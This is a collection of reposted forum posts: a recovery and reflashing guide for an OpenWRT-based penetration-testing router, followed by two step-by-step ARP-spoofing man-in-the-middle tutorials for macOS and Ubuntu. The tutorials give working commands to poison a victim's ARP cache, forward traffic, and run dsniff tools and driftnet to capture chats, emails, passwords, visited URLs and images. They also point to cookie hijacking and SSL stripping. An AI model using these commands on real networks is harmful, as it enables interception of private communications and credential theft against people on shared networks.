r00tabaga: I F'ed it up! what now!

Lifted from the most excellent Ace Hackware forum:   https://acehackware.zendesk.com/entries/25149852-I-broke-my-r00tabaga-

I broke my r00tabaga :(

Taylor Banks
posted this on August 09, 2013 17:11

If your r00tabaga gets b0rked, here are a few common diagnostic steps you can take to identify and/or reset the device's behavior that may save you needing to rebuild.

Get in.

First and foremost: Try to get in, any way you can. Once you're in, you can re-set passwords, change IPs, enable and disable ethernet and wireless adapters, install and uninstall packages and even re-flash the device with a fresh OpenWRT build if you just want to start over from scratch.

If you can't communicate with your r00tabaga:

• look for an AP you don't recognize with a BSSID that matches your router's MAC address
• try to connect to it via ethernet and get an IP address from it via DHCP
• otherwise, the default ethernet IP is possibly 172.16.42.1 (pineapple) or it's acting as a DHCP client (minipwner)
• if you are unable to ssh to the device on 172.16.42.1, try telnet and ssh on 192.168.1.1 or assign the device an IP with a local DHCP server
• if you still can't get in via SSH, you can try failsafe mode, which will allow you to re-flash the device:
  power on the device, wait almost 5s, push and hold reset button for almost 3s, release.
  the re00tabaga  should reboot and bring up ethernet port with 192.168.1.1, listening via telnet.
  > do you see "failsafe" in the motd when you first login?
• If booted into failsafe mode, try to re-mount your root & extroot:
  mount your root flash filesystem to manually correct a file with
  mount_root then try 
  /etc/init.d/fstab whole_root_enable and reboot; 
  you may need to modify /etc/config/fstab
  once mounted, you'll likely want to modify /etc/config/network and/or /etc/config/wireless
• otherwise, reboot out of failsafe mode with reboot -f
• if SSHed in, you can try using activate minipwner or activate pineapple to reset to default configs on a stable build
• if default configs have been modified or removed, you may need to rebuild (see below).

OpenWRT Resources:

http://wiki.openwrt.org/doc/howto/generic.failsafe#in.failsafe.mode 

Option 1 - Rebuild it from scratch.

To rebuild a r00tabaga:

Read all of the directions through at least once before proceeding so that you understand the process from start to finish. While it isn't complex, building r00tabagas manually does take a little patience and requires at least basic knowledge of a linux or OS X command line. We've automated the setup and configuration in our lab, but knowing how to rebuild your r00tabaga from scratch, by hand, may still come in handy when you least expect it. :)

1. Try to login via telnet or ssh and do a firstboot && reboot. If you can do so, it's faster and easier than re-flashing, but should accomplish the same goal, which is a reset of configuration files to their default state.
2. Once in firstboot, you can: 
3. Re-flash the r00tabaga with attitude-adjustment. If you're using an MR11Uv2, you need the eko build.
   Download the firmware and host it for download on your local machine with netcat:
   nc -l < filename.bin 6666
4. From your router, download the firmware from your local machine with netcat:
   cd /tmp
nc 192.168.1.111 6666 > filename.bin
mtd -r write filename.bin firmware
5. Build as Pineapple using a pivot root
   (If you have a dd image from your original r00tabaga USB drive, you can skip copying the filesystem and go straight to the section entitled Re-image It below.)
6. Copy firewall, network and wireless configs into /etc/config directory as *.p
7. Copy MiniPwner files into /etc/config as *.m
8. Install MiniPwner packages (from the list in step 20, but do NOT install to dest -usb since it's a pivot root)
9. Download and install activate script to //usr/bin, adjust paths as necessary
10. install any additional optional packages
11. run activate minipwner && reboot

Option 2 - Re-image it.

If you want to start with a known-good image of the 8GB root filesystem used at build time, you can download it here and rebuild your r00tabaga by configuring the device to mount the USB filesystem as an extroot. This method is known to work with Sandisk Cruzer Fit 8GB sticks, and has not been tested or verified to work with any other devices.

• Re-flash the r00tabaga with attitude-adjustment (make sure to use the correct version for your hardware! MR11Uv2 needs the eko build to flash from the web gui) or login to the device and run firstboot to get the router into a known fresh state
• Download this dd image and write it to an 8GB Sandisk Cruzer Fit stick.
• Power on the router
• Enabled wireless so that we can get the wireless adapter's MAC address:
  cp /etc/config/wireless /etc/config/wireless.orig 2>/dev/null
sed -e 's/option disabled 1/# option disabled 1/' </etc/config/wireless.orig >/etc/config/wireless 2>/dev/null
reboot
• Make backups of all of the files in /etc/config/ as well as /etc/opkg.conf
• Determine the MAC address of your r00tabaga:
  ifconfig -a | awk '/wlan0/{print $5}'
• Edit /etc/config/wireless as below, replacing the MAC address with your own and the ssid (ex: my-home-wifi), encryption mode (ex: psk2) and key (ex: 1234567890)  with values corresponding to a wireless network your r00tabaga can use to connect to the internet to complete its configuration:
  config wifi-device wlan0
   option type mac80211
   option channel 6
   option macaddr xx:xx:xx:xx:xx:xx
   option hwmode 11ng
   option htmode HT20
   list ht_capab SHORT-GI-20
   list ht_capab SHORT-GI-40
   list ht_capab RX-STBC1
   list ht_capab DSSS_CCK-40
   # REMOVE THIS LINE TO ENABLE WIFI:
   # option disabled 1
config wifi-iface
   option device wlan0
   option network wan
   option mode sta
   option ssid {xxxx}
   option encryption {xxxx}
   option key {xxxx}
• Add a WAN stanza to /etc/config/network that looks like this:
  config interface 'wan'
   option ifname 'wlan0'
   option proto 'dhcp'
• Bounce the network to restart the wifi adapter:
  /etc/init.d/network restart
• Confirm you've got internet access via wlan0:
  ifconfig
ping 4.2.2.2
• Insert the USB stick and confirm that the filesystems are visible. You should be able to see the contents of the USB stick mounted under /mnt/sda2
• Edit /etc/opkg.conf and make sure the URL for the attitude adjustment repository is:
• http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/
• Install base packages and dependencies:
  opkg update
opkg install block-mount kernel kmod-usb-core kmod-usb2 kmod-usb-ohci kmod-usb-storage kmod-fs-ext4 kmod-scsi-generic
• Create an /etc/config/fstab file that looks like this (assuming your USB filesystem is on sda2 wih swap on sda1):
  config global automount
   option from_fstab 1
   option anon_mount 1

config global autoswap
   option from_fstab 1
   option anon_swap 0

config mount
   option target /
   option device /dev/sda2
   option fstype ext4
   option options rw,sync
   option enabled_fsck 0
   option enabled 1

config swap
   option device /dev/sda1
   option enabled 1
• Reboot.
• Now enable the pivot root:
  /etc/init.d/fstab whole_root_enable
• Reboot again. 
• Now update all of your wireless configs (/etc/config/wireless.*) to have the correct MAC address identified above.
• Finally, update your wireless SSIDs to match your device MAC:
export MAC=`ifconfig -a | awk -F: '/wlan0/{print $6$7}'`
sed -i -e "s/option ssid.*/option ssid r00tabaga-${MAC}/" /etc/config/wireless.m
sed -i -e "s/option ssid.*/option ssid r00tabaga-${MAC}/" /etc/config/wireless
/usr/sbin/activate minipwner
• ... and reboot one last time.
• Et voila! One updated r00tabaga!

 Broke it beyond your ability to repair it?  Contact support@acehackware.com

Dsniff and Arpspoof on Mac

This post was originally posted by Lump on machack.org on 24 September 2013 - 12:25 PM.  I have not tested this myself, so no guarantees here.

Using this without authorization is illegal in most places. This guide is for educational and learning use only. Please use common sense and respect personal privacy.


1. What is a Man in the Middle Attack?

As the name describes, you will be the Man in the Middle meaning that you will sneak into the connection between the attacked Device and the Router. This implies that you are inside the same Network (WLAN) of the target.This Attack gives you access to all data running through the attacked Device Internet Connection giving you the possibility to sniff for Chats, Email, Passwords and many many more things.

2. How can I be save from that?

There are Tools that prevent others from flushing your ARP Cache or just use a high encryption while surfing on the Interent such as PGP (Emails) or HTTPS. Theese are just examples, you will find solutions if you search for them.

3. How does the Attack work?

The ARP Protocol is used to map IP Addresses to specific MAC Addresses. Computers do use this to identify other Devices in the local Network.By spoofing ARP Replays you can spoof your identity meaning that your Computer seems to be the targeted Computer (from the view of the Router) and at the same time the targeted Computer thinks you are the Router. Here is a basic schema of this setup:
 

4. Before we start:

First of all you need a Tool to spoof theese ARP Replays. There are some but for this Tutorial we will use the Tool ARPSpoof which is part of the DSniff Package.To get this Tool running on Mac OS X your best bet is to use Mac Ports, so go ahead and download the right Version for your Operating System: Download Page. After that you should be able to use the

port

command in Terminal (/Applications/Utilities/Terminal.app)Run

sudo port selfupdate

followed by

sudo port install dsniff-devel

or

sudo port install dsniff

Note that when you type in your Admin Password it will not be displayed!Let the Installation run, this can take some time. After its finished you should be able to use the

arpspoof

command in Terminal.

5. Run the Attack:

Now you'r able to start the Attack, but before that you should choose the Device you want to Attack. To find all Devices in your local Network use this command:

arp -a

 

The first IP is most likely your Routers Address.Now if you know the IP of your Victim and the IP of your Router then you have almost all information you need to start the Attack.We only need to do one more thing. There is one problem if you intercept someones Internet Connections: You recive Packets that are not meant to be sent to you, so the Operating System will not forward them to the destination, it will just drop them leaving the attacked one without Internet Connection.To get around this run this Commands in Terminal:

sudo sysctl -w net.inet.ip.forwarding=1

sudo sysctl -w net.inet.ip.fw.enable=1

This will enable Packet Forwarding on OS X Systems.Now open up two new Terminal Windows and run theese two commands:

sudo arpspoof -i YOURINTERFACE -t VICTIMIP ROUTERIP

sudo arpspoof -i YOURINTERFACE -t ROUTERIP VICTIMIP

Replace:YOURINTERFACE with the name of your Interface (For WLAN Connections most likely en1 and for LAN most likely en0)VICTIMIP with the IP Address of your VictimROUTERIP with your Router IPAfter this it should look like this:

Resized to 80% (was 835 x 364) - Click image to enlarge

Keep theese two windows open until you want to stop your attack! Okay so now this is all you need to do, your now redirecting the Victims traffic over your Computer to the destination, so your able to read all transmitted Data.

6. How can I sniff Data?

The DSniff Package contains some more very nice Tools:mailsnarf - As the name explains, sniffes for Mailsdsniff - For Common Password sniffing (Does for some reason not capture all Passwords)msgsnarf - This is meant for specific messagesurlsnarf - To sniff for browsed Websites and User Agentsdnsspoof - To spoof DNS Request and redirect Websiteswebmitm - Used to decrypt SSL (HTTPS) with faked CertificatesOther usefull Tools:Ettercap-ng - ARPSpoofing and Password Sniffing ToolSSLStrip - To decrypt SSL (HTTPS) Websites (Did not get this one to run on OSX!)tcpdump - Dump all captured Traffic for later analyzis and Cookie Stealinghamster & ferret - Cookie HijackerThere are Scripts for Facebook Chat Sniffing and you will find much more if you search for it.

7. How do I stop the Attack?

Just hit ctrl+c in the opened Terminal, wait 3-4 sec and then the Tool should be terminated.I hope you enjoyed, happy hacking 

This post has been edited by Lump: 25 September 2013 - 02:32 AM 

(!) Driftnet + ARP Poisoning = OverLord

These are the command line tools we will be using to spoof our subject into thinking that we are the router, therefore sending all its network traffice request through us.

Tools: dsniff suite and driftnet.
on Ubuntu: apt-get install driftnet dsniff

Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our subjects to flow through our machine. We need to switch on ip_forwarding.

1. To check the current setting type: cat /proc/sys/net/ipv4/ip_forward
if you get a "0", it is currently off.

2. Type the ff to turn it on: echo 1 > /proc/sys/net/ipv4/ip_forward
"1" being to switch it on.

3. Then you can check again: cat /proc/sys/net/ipv4/ip_forward

4. Now we have to setup the traffic flow using arpspoof. the switch "-t" means target.

arpspoof -t 10.10.10.1 10.10.10.99 - watch traffic from x.x.x.1 (router) to x.x.x.99 (host)
we'll also to the reverse to watch traffic going the opposite direction:
arpspoof -t 10.10.10.99 10.10.10.1

5. Let the fun begin: OverLord!
msgsnarf -i eth0 - will watch chat sessions and messenger clients (yahoo,gmail,irc...etc)
urlsnart -i eth0 - will URL used by the subject
mailsnarf -i eth0 - will watch for emails
dnsiff -i eth0 - will watch for passwords
driftnet -i eth0 - will watch for pictures on the net

6. To shut down all: killall arpspoof